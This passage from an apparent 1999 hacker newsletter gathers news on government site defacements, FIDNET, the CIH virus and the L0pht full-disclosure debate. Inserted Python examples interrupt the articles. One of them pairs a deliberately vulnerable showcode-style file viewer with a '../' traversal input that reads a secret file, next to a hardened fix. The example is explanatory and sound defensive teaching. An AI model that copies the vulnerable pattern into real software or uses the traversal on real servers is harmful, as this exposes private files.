A variety of federal sites have been defaced by political protesters. But the primary motivation
behind the attack on the White House site was merely to show that it could be done, a teen-ager who
said he was involved in the attack told MSNBC.

A telephone conversation with the 18-year-old was arranged by a mutually trusted intermediary. The
teen, who claimed to be a member of the group known as gH or Global Hell, spoke on the condition that
neither his real name nor his hacker nickname would be published. To back up his claim, he provided
internal user logs listing White House staff. His account also was consistent with other reports
provided by trusted third parties.

`JUST LUCK’

The teen said the White House Web break-in was actually just luck. Members of gH caught the White
House system administrator transferring log files in an insecure manner via an unsecured FTP site that
was snooped out from another box (computer), he told MSNBC.

"I have no idea why they would do that. Whoever that admin was, he didn’t know what he was doing," he
said. Along with gH, a group calling itself the Hong Kong Danger Duo took part in the White House hack,
the teen said.

He said the White House hack lasted for only a few minutes, due to what is known as a crontab, a timed
command set by the system administrator. This command automatically refreshes the entire site with identical
content from a secure server to help guard against the kind of attack that took place Monday.

OTHER DEPARTMENTS HIT

Government sources told NBC News that attackers also hit the Web servers for the departments of Energy,
Interior and Labor, as well as the U.S. Information Agency’s Web site. All those Web sites were in service
Tuesday afternoon, although traffic to the Energy Department’s Web site was redirected to a numerical
Internet address.

The sources said the intruders left behind cyber-graffiti slogans saying, for example, "You bombed the
Chinese Embassy, this is what you’re going to get." Some of the graffiti was in Chinese characters, the
sources said.

In all cases, the Web computer servers contained only publicly available information, and no classified
information was compromised, officials emphasized.

The politically motivated attacks on departmental Web sites appear to be unrelated to the White House attacks.
The teen from gH said he had no idea who carried out the other computer attacks, an assertion that meshed with
other reports.

Several hacker-oriented sites including AntiOnline as well as Hacker News Network and Attrition.Org
posted what they said were copies of the White House hack. A message hidden inside the source code for the page
reads: "You found my elite hidden source. Wow. Ok, no real msg here. Stop all the war, no point for it. This box
wasn’t ever secure."

Brian Martin, who runs the Attrition.Org site, said the "stop all the war" reference doesn’t mean the attack was
launched with politics in mind. "A lot of hackers will do that to kind of justify what they are doing," Martin said.
"They hacked this site because they could," he said. "They saw a window of opportunity and took it."
The White House site is operated under contract by PSINet of Herndon, Va.

NBC News correspondent Jim Miklaszewski and
MSNBC’s Bob Sullivan contributed to this report.
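The article above describes the defence that limited the damage: a cron job that re-publishes the whole site from a secure master copy. The script below is an added example of that idea, not code from the White House, PSINet or HNN. It assumes a read-only "master" tree that the web server cannot write to, a manifest of SHA-256 hashes taken at publish time, and a cron schedule that runs it; the tiny site, the defacement and the dropped file are constructed in a temporary directory so the whole thing runs offline.

```python
"""Periodic web-root integrity check and restore (added example, not the page's own code).

Assumption: a read-only 'master' copy of the site lives where the web server cannot
write, and this script is run from cron. Anything that differs from the master is
reported and re-published; files the master does not know about are removed.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash one file in chunks so large assets do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def find_tampering(manifest: dict, webroot: Path) -> dict:
    """Compare the live web root against the publish-time manifest."""
    live = build_manifest(webroot)
    return {
        "modified": sorted(k for k in manifest if k in live and live[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in live),
        "added": sorted(k for k in live if k not in manifest),
    }


def restore(master: Path, webroot: Path, findings: dict) -> int:
    """Re-publish modified/missing files from master and delete foreign files.
    Returns the number of corrective actions taken (zero means the site was clean)."""
    actions = 0
    for rel in findings["modified"] + findings["missing"]:
        dst = webroot / rel
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(master / rel, dst)
        actions += 1
    for rel in findings["added"]:
        (webroot / rel).unlink()
        actions += 1
    return actions


def demo() -> tuple:
    """Constructed scenario: publish a two-file site, deface it, detect, restore."""
    with tempfile.TemporaryDirectory() as tmp:
        master = Path(tmp) / "master"
        webroot = Path(tmp) / "webroot"
        (master / "img").mkdir(parents=True)
        (master / "index.html").write_text("<h1>Welcome</h1>\n")
        (master / "img" / "logo.txt").write_text("logo bytes\n")
        shutil.copytree(master, webroot)
        manifest = build_manifest(master)  # taken at publish time, stored off the web box

        # Simulated defacement: front page replaced, a file dropped, an asset deleted.
        (webroot / "index.html").write_text("<h1>defaced</h1>\n")
        (webroot / "hidden.txt").write_text("msg\n")
        (webroot / "img" / "logo.txt").unlink()

        before = find_tampering(manifest, webroot)
        actions = restore(master, webroot, before)
        after = find_tampering(manifest, webroot)
        return before, actions, after


if __name__ == "__main__":
    print(demo())
```

The manifest, not the master copy, is what makes this a detection as well as a refresh: a blind re-copy hides the fact that a defacement happened, while the findings dictionary is exactly what should be logged and alerted on each run.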

@HWA

22.0 Feds to install IDS
~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Feds Look to Install IDS


contributed by erewhon
The GSA, the Critical Infrastructure Assurance Office, the National Security Agency and the FBI's National
Infrastructure Protection Center (jeeez, think they have enough people working on this?) are working on a
Federal Intrusion Detection Network (FIDNET) which will provide a common center for response to cyber
attacks on agencies.

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-fidnet-5-11-99.html

MAY 11, 1999 . . . 18:10 EDT


Agencies lay groundwork for intrusion-detection
network

BY DIANE FRANK (dfrank@fcw.com)

A group of federal agencies has completed the initial model of a
governmentwide intrusion-detection network that will provide a common
center for response to cyberattacks on agencies.

The Federal Intrusion Detection Network (FIDNET) is in the very early
stages of development, and the group of federal agencies heading the
development effort recently agreed on possible agency responsibilities and a
reporting structure, said Tom Burke, assistant commissioner of information
security at the General Services Administration's Federal Technology Service,
today at the Outlook 2000 conference in Falls Church, Va.

GSA, the Critical Infrastructure Assurance Office, the National Security
Agency and the FBI's National Infrastructure Protection Center are all
developing FIDNET as part of President Clinton's directive to protect the
nation's mission-critical systems. The system is intended to provide all
agencies with intrusion-detection systems that will allow agencies to locate
incidents across the government as soon as they occur. It also will serve as a
center for analysis of intrusions or attacks.

The system will be made of three main blocks, with the civilian agencies
reporting to the Defense and intelligence agencies and possibly a full-time
program management office overseeing the whole system. FIDNET is based
on the Defense Department's incident-reporting network, which is much
further along than the efforts in the civilian agencies. "We're looking to
leverage the work that has already been done at Air Force and DOD so we
don't duplicate their effort," Burke said.

The blocks eventually will include a similar network being developed in the
private sector and the Federal Computer Incident Response Capability center
at GSA, Burke said.


@HWA

23.0 CIH Damages climb in China
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

360,000 Systems Damaged in China


Contributed by DongWong
A survey released earlier this month indicates that at least 360,000 systems were damaged by
the CIH or Chernobyl virus. The damage was estimated at Rmb1 million (US$120 million). The
survey was conducted by Beijing Rising Computer Science and Technology Development Co., Ltd.,
a Chinese antivirus company.

Asia BizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/57681

24.0 Company claims damages in web page defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Company Claims Damages From Attack


contributed by War3z Dud3
An Issaquah, Washington high-tech company is claiming thousands of dollars worth of damage after
it had its web page defaced. The defaced page was a protest of NATO's bombing of the Chinese Embassy
in Belgrade. The FBI is investigating and has reportedly traced the attackers to three sites: one in New York,
one in Massachusetts, and another in St. Louis.

Yahoo Daily News
http://dailynews.yahoo.com/headlines/local/state/washington/story.html?s=v/rs/19990510/wa/index_2.html#2

Internet Company Hit By Hackers - (ISSAQUAH) -- An Issaquah
high-tech company is dealing with thousands of dollars in damage, thanks to the Chinese embassy
bombing in Belgrade. Michael Renz at webcityusa-dot- com went online last night to update his
websites for a dozen local businesses. That's when he realized someone had destroyed them. In
their place, the hackers had placed graphic pictures of embassy bombing victims and hate messages
blasting the U-S and NATO. Authorities, including the FBI, are investigating and have reportedly
traced the action to three different university websites: one in New York, one in Massachusetts,
and another in St. Louis.


@HWA


25.0 Three .gov sites hacked
~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Three Gov Servers Cracked in Protest of Embassy Bombing


contributed by Space Rogue
The Department of Energy, The Department of the Interior, and the National Park Service all had their
web sites defaced in protest of the NATO bombing of the Chinese Embassy in Yugoslavia. The defaced
pages included pictures of the people killed in the bombing.

ABC News
http://abcnews.go.com/sections/world/DailyNews/kosovo_chinacyber_990509.html

Australian Broadcasting Corporation
http://www.abc.net.au/news/newslink/weekly/newsnat-11may1999-2.htm

C|Net
http://www.news.com/News/Item/0,4,36311,00.html?owv

CNN
http://www.cnn.com/TECH/computing/9905/10/hack.attack.02/index.html

Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0510/web-nato-5-10-99.html

ITN
http://www.itn.co.uk/World/world19990510/051005w.htm

Federal Computer Week;

MAY 10, 1999 . . . 14:25 EDT


Hackers retaliate after NATO bombing

BY BRAD BASS (brad_bass@fcw.com)

A group of Chinese hackers defaced the home pages of the departments of
Energy and Interior this past weekend, apparently in retaliation for NATO's
accidental bombing of the Chinese embassy in Belgrade.

The hackers claimed their motives were not political but were a response to
the death of Chinese journalists resulting from NATO's attack. The messages
were written in Chinese and English.

The hackers referred to the bombing as a "Nazi action" and urged NATO,
and specifically the United States, to accept responsibility. "You have owed
[sic] Chinese people a bloody debt which you must pay for," said a message
on the DOE Web site on Sunday afternoon. "We won't stop attacking until the
war stops!"


A spokesman for iDefense, an information clearinghouse on critical
infrastructure protection, said the attack probably did little harm but
characterized it as "a warning sign" to the government.

"It's just another sign that these types of things are easy to accomplish if you
have a modem and a little technical knowledge," the spokesman said. "It's not
too far removed from taking it to another more harmful level."



-=-


C|Net;

Chinese attack embassy bombing on Net
By Reuters
Special to CNET News.com
May 10, 1999, 8:15 a.m. PT
URL: http://www.news.com/News/Item/0,4,36311,00.html

BEIJING--Chinese computer buffs flooded cyberspace with anti-U.S. rhetoric today,
hacking into a U.S. embassy Web site and overloading chat rooms with condemnation of
the NATO bombing in Yugoslavia.

As angry protesters hit the pavement in a more traditional form of outrage, hurling
whatever came to hand at the U.S. and British embassies in Beijing, China's wired
elite logged on to vent their anger.

More than 24,000 protest messages have been posted on one popular chatroom at Netease.com
since three NATO missiles slammed into the Chinese embassy compound in Belgrade Friday night,
killing three journalists and injuring more than 20 people.

Most of the postings were one-line invectives against President Clinton or the NATO bombing
campaign in Yugoslavia. But others focused on ways to retaliate for the strike.

"Our strongest weapon is for the masses to begin a campaign to boycott American goods," wrote
one user. "This is what the Americans are most scared of. Americans love money and they listen
the most to taxpayers. If they lose economic gains then they lose the essentials."


Another user, writing under the name "KILL-USA," called on China to make use of the situation
to push for entry into the World Trade Organization.

One urged his counterparts to pirate U.S. software to cripple the American economy.

Others condemned students and workers who had attacked foreign journalists covering violent
protests outside the U.S. embassy over the weekend.

"The anger in our hearts must not lead us to lose reason and curse and beat foreigners when we
see them," wrote a user called Chinese Kung Fu.

The outpouring of angst on the Web was so great that many of China's most popular sites added
additional servers to keep up with the demand.

The popular Sohu.com also set up a special site to gather responses to the attack on the Chinese
embassy and was receiving one response every second earlier today.

In addition to the Web postings, Chinese hackers twice assailed the U.S. embassy Web site,
replacing the home page with text reading "down with barbarians," the state-run China Daily reported.

Today the Web site could be accessed through an American server, but the Chinese route was blocked.

Word of the bombing spread rapidly on the Internet--in contrast to the many hours the official media
took to report it--and many students said they first heard about street protests in Beijing on the Web.

More than 2 million Chinese use the Internet, one of the only forums of expression free from government
oversight.

Story Copyright © 1999 Reuters Limited. All rights reserved.




@HWA


26.0 Full Disclosure, the only way to go.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Full Disclosure - The Only Way to Be Sure


contributed by remage
A rather interesting rant has been posted by L0pht Heavy Industries, Inc. The rant covers
the issue of Full Disclosure which has been argued about and argued about. In the wake of
the recent showcode-Webtrends-L0pht-Microsoft advisory the L0pht makes a very convincing
argument that Full Disclosure is the only way to protect those who are
vulnerable.

L0pht Heavy Industries, Inc.
http://www.l0pht.com/

05.10.1999
There is a new trend in the reporting of security vulnerabilities
these days. Many of the problems are being reported by companies
that make products to detect these problems. While more people
researching the security of products is a good thing, it is certainly
having an effect on the free flow of security information.
Sometimes this effect is to the detriment of the customers of the
product that the flaw exists in.

If a company makes a product that scans for security problems,
they are going to want to add their newly discovered vulnerability
to their list of things to scan for. They are probably, depending on
the seriousness of the problem they have uncovered, going to want
to make the advisory of the problem into a full scale press release
that will hype their product. Usually the press release won't really
tell you how to find the problem or how to solve it. You are going to
need to download their product for that.

When security problems exist on production servers accessible from
the internet, time is critical. Every day that goes by is another day
that the server is exposed. How many people know about the
problem? Who is actively exploiting it? It is impossible to tell. Good
ethical security practice is to tell the people affected quickly,
especially if there are steps they can take to mitigate or eliminate
the risk themselves.

The L0pht recently found a problem with Microsoft's IIS 4.0 web
server, the showcode problem. It allowed web users to read files
anywhere on the web server that the file permissions were set to
be world-readable. This turns out to be the case in many web
servers that are not locked down properly. The L0pht was surprised
at how widespread the problem was. Many high profile e-commerce
servers were affected. Many, many corporate web servers were
affected.

The research of the problem, which took less than a day, came up
with a simple solution. Delete the sample files which made the
machine vulnerable. They don't need to be on production servers
anyway. We crafted an advisory and gave out the solution.
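The showcode problem described above is a sample "view source" page that takes a file name from the request and reads it relative to the web root without checking where the resulting path ends up, so a request containing "../" reaches any world-readable file on the box. Deleting the sample files is the fix the L0pht recommends; the example below is an added illustration (not the L0pht's advisory code, not Microsoft's) of why the viewer was exploitable and what a viewer that must stay in production has to do instead. The directory name "samples", the file names and the secret are constructed for the demo.

```python
"""Sample-file source viewer: the showcode pattern beside a hardened version
(added example; not code from the page, the L0pht or Microsoft)."""
import os
import tempfile
from pathlib import Path

SAMPLE_SUBDIR = "samples"  # assumed name of the one directory the viewer may expose


def show_source_vulnerable(webroot: str, source: str) -> str:
    """The showcode pattern: whatever 'source' names is joined onto the web root
    and read. A '..' component walks out of the root, so any world-readable
    file on the server can be fetched."""
    path = os.path.join(webroot, source)
    with open(path, "r") as f:
        return f.read()


def show_source_hardened(webroot: str, source: str) -> str:
    """Resolve the requested path (following symlinks) and refuse anything that
    does not land inside the sample directory."""
    base = Path(webroot, SAMPLE_SUBDIR).resolve()
    target = (base / source).resolve()
    try:
        target.relative_to(base)           # raises ValueError when target is outside base
    except ValueError:
        raise PermissionError("path escapes the sample directory: %s" % source)
    if not target.is_file():
        raise FileNotFoundError(source)
    with target.open("r") as f:
        return f.read()


def demo() -> dict:
    """Constructed layout: <tmp>/wwwroot/samples/hello.asp is the only file the
    viewer should serve; <tmp>/secret.ini sits outside the web root entirely."""
    with tempfile.TemporaryDirectory() as tmp:
        webroot = Path(tmp) / "wwwroot"
        (webroot / SAMPLE_SUBDIR).mkdir(parents=True)
        (webroot / SAMPLE_SUBDIR / "hello.asp").write_text("<!-- sample -->")
        (Path(tmp) / "secret.ini").write_text("dbpassword=constructed-sample")

        out = {}
        # Vulnerable viewer: the traversal reaches the file outside the web root.
        out["vulnerable_leak"] = show_source_vulnerable(
            str(webroot), SAMPLE_SUBDIR + "/../../secret.ini")
        # Hardened viewer: the same traversal is rejected before any file is opened.
        try:
            show_source_hardened(str(webroot), "../../secret.ini")
            out["hardened_blocked"] = False
        except PermissionError:
            out["hardened_blocked"] = True
        # Hardened viewer still serves the file it is meant to serve.
        out["hardened_ok"] = show_source_hardened(str(webroot), "hello.asp")
        return out


if __name__ == "__main__":
    print(demo())
```

The check is done on the resolved path rather than by searching the string for "..", because encoded, doubled or symlinked variants of a traversal all collapse to the same real path; the string-matching approach is what tends to get bypassed. Even so, the advisory's advice stands: sample code has no business on a production server, and removing it is a smaller change than auditing it.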

When we reported this to Microsoft they said that they had known
about the problem for "several weeks". They had been notified by
WebTrends about the problem, were researching it, and would issue
a Security Bulletin. It didn't seem to be so complicated an
issue that it would take several weeks to research. And the fix was
simple. Just delete the files. No need to download a hotfix or even
tweak the registry. What was taking so long?

The L0pht released the showcode advisory to Bugtraq, computer
industry reporters, and Microsoft on May 7, 1999, 9:30am EST.
Later that day, approximately 1:40 pm EST, WebTrends released a
press release about the same problem. It spoke of how WebTrends
had discovered the problem. The WebTrends press release didn't
tell how to detect the problem and had no solution to the problem.
Two things that were present in the L0pht advisory. It seemed that
you had to download and run their product if you wanted this
information.

It makes one wonder if the press release was put out at that
particular time because the L0pht had informed the public about the
problem first. It makes one wonder why Microsoft kept this problem
and easy solution to themselves for several weeks.

Many crackers keep security vulnerabilities secret so that they can
exploit them without worrying about vendor patches or fixes by
system administrators. This is looked down upon highly by the
security community as totally unethical. Why keep the
vulnerabilities secret unless you are going to exploit them, or
perhaps trade them for something?

Now we have software vendors keeping things secret. At least
secret for a substantial period of time. Is this the way we want the
industry to behave?

This is why full disclosure mailing lists such as Bugtraq and web
sites such as Packet Storm Security are so important. They allow
customers to get vulnerability reports, and hopefully fixes, in a
timely manner. There is no centralized clearinghouse such as the
software vendor or some government agency to slow things up for
their own ends.

Vulnerability information is extremely valuable both to attackers and
customers. Companies and organizations that release this
information openly and as soon as possible are doing the security
community a service. Those who choose to use the information for
their own purposes first put customers at risk.

@HWA

27.0 NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NIPC releases CyberNotes


contributed by Simple Nomad
The National Infrastructure Protection Center (NIPC), which is essentially being run by the FBI,
has released online copies of "CyberNotes", the newsletter whose mission is to "support security
and information system professionals with timely information on cyber vulnerabilities, hacker
exploit scripts, hacker trends, virus information, and other critical infrastructure-related best
practices". It reads like a government version of numerous hacker web sites. Our tax dollars at work.

NIPC Cyber Notes
http://www.nipc.gov/nipc/nipcpublic.htm

Oh, and if you have never visited the NIPC web site it is
good for a laugh or two.

National Infrastructure Protection Center
http://www.nipc.gov/

@HWA

28.0 Cure for CIH
~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Cure for CIH Found


contributed by Scores
A student in Bangladesh claims to have found a cure for the CIH or Chernobyl virus that wiped out thousands of
systems worldwide last month. Monirul Islam Sharif, an undergraduate computer science student, claims that a
70K-byte C language program he has named MRECOVER will recover the FAT table and the first partition of a
FAT16 table.

Computer World
http://www.computerworld.com/home/news.nsf/all/9905101cih

MRECOVER
http://members.xoom.com/monirdomain

Student touts 'Chernobyl' cure
By Sanjit Singh


NEW DELHI -- One student invented it, but another has written an antidote to help users who lost data to the CIH
computer virus.

The Chernobyl virus, also known as CIH, was invented by onetime Taiwanese student Chen Ing-hau and
caused havoc all over Asia April 26, infecting thousands of PCs in South Korea, Singapore, India, Bangladesh
and China. (Most major U.S. corporations with updated antivirus software escaped serious damage.) But it now
has a cure, courtesy of Monirul Islam Sharif, an undergraduate computer science student at Dhaka
University in Bangladesh.

Sharif, 21, said he wrote the 70K-byte C language program, which he called MRECOVER, in 24 hours.

"I started working on it on April 27, when a friend brought his infected hard drive to me, and by the next day, it
worked when I tried it out. Most of the data on the disk was recovered," he said.

Sharif tried it on several other computers at Dhaka, and it worked there, too, recovering data in minutes.

"If your machine uses FAT [File Allocation Table], MRECOVER will recover all the data on the disk within
three to four minutes. But if your computer uses FAT 16, then it will recover all data after the first partition,
limiting the recovery to between 40 and 60 percent," Sharif said. He added that the antidote doesn't work on hard
drives with a capacity of 8G bytes or more.

The program is free to use and has been posted on the Web at http://members.xoom.com/monirdomain for
anybody who wants to download it. A new and improved version for machines that use FAT 16 will be ready
within days and followed by one for large-capacity hard drives. Sharif said he has received 3,000 hits and
innumerable e-mail messages since he put MRECOVER on the Internet May 5, but the inventor
doesn't see any commercial gain from the program.

Sharif, who was born in England and spent his early childhood there, graduates next June. He said his
ambition is to head to the U.S. for higher studies.

"I would like to go to the U.S. to do a master's in computer science. But it's unlikely that I will specialize in
antivirus programs. I still find general programming much more interesting," he said.
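MRECOVER's internals are not on the page, so the block below is an added illustration of the general recovery idea rather than Sharif's program: a FAT16 volume keeps two copies of the File Allocation Table, and when the first copy at the start of the disk has been overwritten, the second copy can be validated and written back. It builds a tiny FAT16 image in memory (constructed, 12 sectors), parses the BIOS Parameter Block to locate both FAT copies, wipes the first copy to simulate damage, and restores it. The assumption that the second copy survived does not always hold, which is consistent with the partial recovery rates quoted above.

```python
"""FAT16 layout parsing and FAT-copy recovery (added example; not MRECOVER's code).

Assumption: the second FAT copy survived the damage. A real tool would also
cross-check the restored chains against directory entries before trusting them.
"""
import struct


def parse_bpb(boot: bytes) -> dict:
    """Read the BIOS Parameter Block from sector 0 and compute where each FAT copy,
    the root directory and the data area start (byte offsets)."""
    if boot[510:512] != b"\x55\xaa":
        raise ValueError("boot sector signature missing")
    (bytes_per_sector, sectors_per_cluster, reserved,
     num_fats, root_entries, total16) = struct.unpack_from("<HBHBHH", boot, 11)
    sectors_per_fat = struct.unpack_from("<H", boot, 22)[0]
    fat_size = sectors_per_fat * bytes_per_sector
    fat1 = reserved * bytes_per_sector
    root_dir = fat1 + num_fats * fat_size
    return {
        "bytes_per_sector": bytes_per_sector,
        "sectors_per_cluster": sectors_per_cluster,
        "num_fats": num_fats,
        "fat_size": fat_size,
        "fat_offsets": [fat1 + i * fat_size for i in range(num_fats)],
        "root_dir_offset": root_dir,
        "data_offset": root_dir + root_entries * 32,
        "total_sectors": total16,
    }


def fat_copies(image: bytearray, layout: dict) -> list:
    n = layout["fat_size"]
    return [bytes(image[off:off + n]) for off in layout["fat_offsets"]]


def fat_looks_valid(fat: bytes) -> bool:
    """Entry 0 of a FAT16 holds the media descriptor (0xF0 or 0xF8..0xFF) with 0xFF above it."""
    return len(fat) >= 4 and fat[1] == 0xFF and (fat[0] == 0xF0 or fat[0] >= 0xF8)


def cluster_chain(fat: bytes, start: int) -> list:
    """Follow a cluster chain until an end-of-chain marker (>= 0xFFF8) or a bad entry."""
    chain, c = [], start
    while 2 <= c < 0xFFF8 and c * 2 + 2 <= len(fat):
        chain.append(c)
        c = struct.unpack_from("<H", fat, c * 2)[0]
    return chain


def repair_fat(image: bytearray, layout: dict) -> str:
    """If the copies disagree, rewrite every copy from the first one that looks intact."""
    copies = fat_copies(image, layout)
    valid = [i for i, c in enumerate(copies) if fat_looks_valid(c)]
    if not valid:
        return "no intact copy"
    good = copies[valid[0]]
    if all(c == good for c in copies):
        return "consistent"
    for off in layout["fat_offsets"]:
        image[off:off + len(good)] = good
    return "restored from FAT%d" % (valid[0] + 1)


def build_image() -> bytearray:
    """Constructed 12-sector FAT16 volume: 1 reserved sector, 2 FATs of 1 sector,
    a 16-entry root directory and a file occupying clusters 2 -> 3 -> 4."""
    bps, spc, reserved, nfats, root_entries, spf = 512, 1, 1, 2, 16, 1
    total = reserved + nfats * spf + (root_entries * 32) // bps + 8
    boot = bytearray(512)
    boot[0:3] = b"\xeb\x3c\x90"
    boot[3:11] = b"MSWIN4.1"
    struct.pack_into("<HBHBHHBH", boot, 11, bps, spc, reserved, nfats, root_entries, total, 0xF8, spf)
    boot[510:512] = b"\x55\xaa"
    fat = bytearray(512)
    struct.pack_into("<HHHHH", fat, 0, 0xFFF8, 0xFFFF, 0x0003, 0x0004, 0xFFFF)
    return bytearray(boot + fat + fat) + bytearray((total - reserved - nfats * spf) * bps)


def demo() -> dict:
    image = build_image()
    layout = parse_bpb(bytes(image[:512]))
    fat1_off, fat1_len = layout["fat_offsets"][0], layout["fat_size"]
    image[fat1_off:fat1_off + fat1_len] = bytes(fat1_len)   # simulated damage to FAT1
    status = repair_fat(image, layout)
    copies = fat_copies(image, layout)
    return {
        "fat_offsets": layout["fat_offsets"],
        "root_dir_offset": layout["root_dir_offset"],
        "data_offset": layout["data_offset"],
        "status": status,
        "copies_equal": copies[0] == copies[1],
        "chain": cluster_chain(copies[0], 2),
    }


if __name__ == "__main__":
    print(demo())
```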

@HWA

29.0 Anonymous web browsing from 303.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Anonymous Web Surfing


Contributed by Netmask
303.org is now offering anonymous web surfing. To use it, set your browser to use 303.org, port 1050, as its HTTP
proxy server. This server will forward the type of client you use, but not your IP
address. More info available at 303.org

http://www.303.org

@HWA

30.0 Yugoslavia Offline?
~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

YUGOSLAVIA OFFLINE
by BHZ, Wednesday 12th May 1999 on 9:30 pm CET
It looks like Yugoslavia's Internet users will be offline for a long time. As stated on
www.beograd.com "We have reliable information that the US Government ordered
shut down of satellite feeds for Internet customers in Yugoslavia, as a result of NATO
air war against this country. This action might be taken as soon as later tonight or
tomorrow (May 12 or 13, 1999)". Press release below.


May 12, 1999


US shuts down Yugoslav Internet - For immediate
release

BELGRADE, MAY 12 - We have reliable information
that the US Government ordered shut down of satellite
feeds for Internet customers in Yugoslavia, as a result
of NATO air war against this country.
This action might be taken as soon as later tonight or
tomorrow (May 12 or 13, 1999).

This is a flagrant violation of commercial contracts
with Yugoslav ISPs, as well as an attack on freedom of
the Internet.

A Web site in protest of these actions should be up
shortly. We will supply you with the URL. In the
meantime, please be so kind to inform as many people
as possible about this tragic event for the Internet
community in Yugoslavia and Europe.

BeoNET
Belgrade, Yugoslavia


May 13th

Contributed by cyberdiva

From Beograd.com:


16:50 According to the last information, "LORAL ORION" has given up, until further notice,
disconnecting Yugoslavia from Internet, because of the protests from all around the world
that followed the announcement


15:55 FONET - One of the biggest US communication satellites of the firm "LORAL ORION" has
informed Belgrade provider "Informatika" last night that because of "vis major" they would
have to stop Internet emitting toward all Yugoslav providers who are linked to providers
in USA. "This decision is the result of the executive order of the President of USA, Bill
Clinton, banning emitting of all services from USA into Federal Republic of Yugoslavia
(Serbia and Monte Negro)", says the message of "LORAL ORION" to the general Director of
"Informatika", Slobodan Sreckovic. "In accordance with that, LORAL ORION will, starting from
May 12, 1999, stop its services", it is said at the end of the statement. On Thursday, May 13,
in morning hours, "Informatika" confirmed to Fonet that "this has not
happened yet, but they are expecting to be disconnected from USA Internet satellite service toward
Yugoslavia any minute/hour now".


--diva


May 14th


RE: Internet connection in Yugoslavia


Now the mainstream media has picked it up and although Loral for the time has relented, it looks like
the Clinton administration is still considering it.


<http://www.foxnews.com/world/051499/kosovo_internet.sml>
Clinton Deciding Whether to Cut Yugoslavia Internet Access


I don't have to remind you there has been no formal declaration of WAR by the United States.


It makes me wonder how are private companies going to be able to secure global business if underneath
it all, they are forced to do the political bidding of the United States against their own customers...


Hacker News Network is doing an expose on the story going up today as well.


Thanks for hearing me out...


--diva



FoxNews;

Clinton Deciding Whether to Cut
Yugoslavia Internet Access
8.08 a.m. ET (1208 GMT) May 14, 1999


WASHINGTON - Confronted with a dilemma of war in the information age, the Clinton administration is trying to
decide whether its trade embargo extends to Internet access for some of Yugoslavia's citizens.

Loral Space and Communications Ltd. of New York said it may be forced to cut transmissions into Yugoslavia from
one of its satellites, which serves at least two of the country's major Internet providers.

"We're still not clear on this whole thing," said Jeannette Colnan, a spokeswoman for Loral Space.

President Clinton issued an executive order two weeks ago banning U.S. companies from selling or supplying to
Yugoslavia "any goods, software, technology or services," although the order allows for the "special consideration of
the humanitarian needs of refugees."

The National Security Council said information services are generally considered exempt from trade embargoes, but that
electronic commerce is affected. The Internet performs both functions.

"We'll need to inquire further about the appropriate applications of the law," said David Leavy, a spokesman for
the security council.

Loral Space said Thursday that it was discussing its obligations under the embargo with the Treasury
Department, which didn't respond to requests for comment.

Experts said any move by the United States to limit civilian use of the Internet would be unprecedented.

NATO has already attacked Serbian broadcast stations to stem what it describes as propaganda, and Serbs have
established an extraordinary network on the Internet criticizing ongoing air strikes.

But the Internet also serves as a conduit for civilians to receive unadulterated news reports about NATO efforts.

"The Internet remains at this point one of the major sources inside Yugoslavia for
objective news reporting about the war," said Jim Dempsey of the
Washington-based Center for Democracy and Technology.

Word of the threat to shut down Internet access to at least parts of Yugoslavia
spread quickly across the global network, where it was condemned in some e-mail
messages and online discussion groups.

"To put it bluntly, we somehow got used to air-raid sirens, bombings and threats of
invasion, but we don't know how we're going to survive without the Internet," said
Alex Krstanovic, co-founder of Beonet, one of the Internet providers in Yugoslavia.

But some argued that access should be cut off.

"Continuing to provide these services would be kind of like giving aid to the enemy,"
one person wrote.

The possible loss of Internet access also illustrated the fragility of the computer
network and the importance assigned to it internationally.

Computer traffic in Yugoslavia uses both satellite and traditional land-based
telephone lines, but the loss of the Loral satellite could dramatically reduce the
Internet bandwidth available to citizens there, causing slow connections or even
blackouts.

Web sites reliant on the Loral satellite continued to be accessible overnight
Thursday, and there were no substantiated reports of anyone unable to retrieve
information from outside the country using the Internet.

A spokeswoman at the organization that registers Web addresses ending with the
country's "yu" suffix said that she was familiar with the reports but that there had
been no problems yet.





@HWA

31.0 Spam Recycling site deals with spammers for you
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Who75

http://www.maximumpcmag.com/inside_sources/99.5/99.5.11.phtml

Site Offers To ''Recycle'' Spam

If you feel guilty about tossing an aluminum can in the garbage, spamrecycle.com
may be the site for you.

The site is offering to "recycle" spam you send the site and submit it for complaint
to the proper authorities. Although it may sound like a shell company spam artists
use to farm more e-mail accounts, spamrecycle.com is supported by the Coalition
Against Unsolicited Commercial E-mail.

Spamrecycle.com officials said the site was created to help people fight spam. Many spam perpetrators
give e-mail addresses that offer to remove the spam victim from further unsolicited email.
Unfortunately, in many cases, the e-mail only validates the victim's e-mail address, causing more spam
to pour in.

Spamrecycle.com is sponsored by CDnow.com, which is giving people who recycle their spam a $5
coupon towards purchases from the site.

@HWA


32.0 quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner
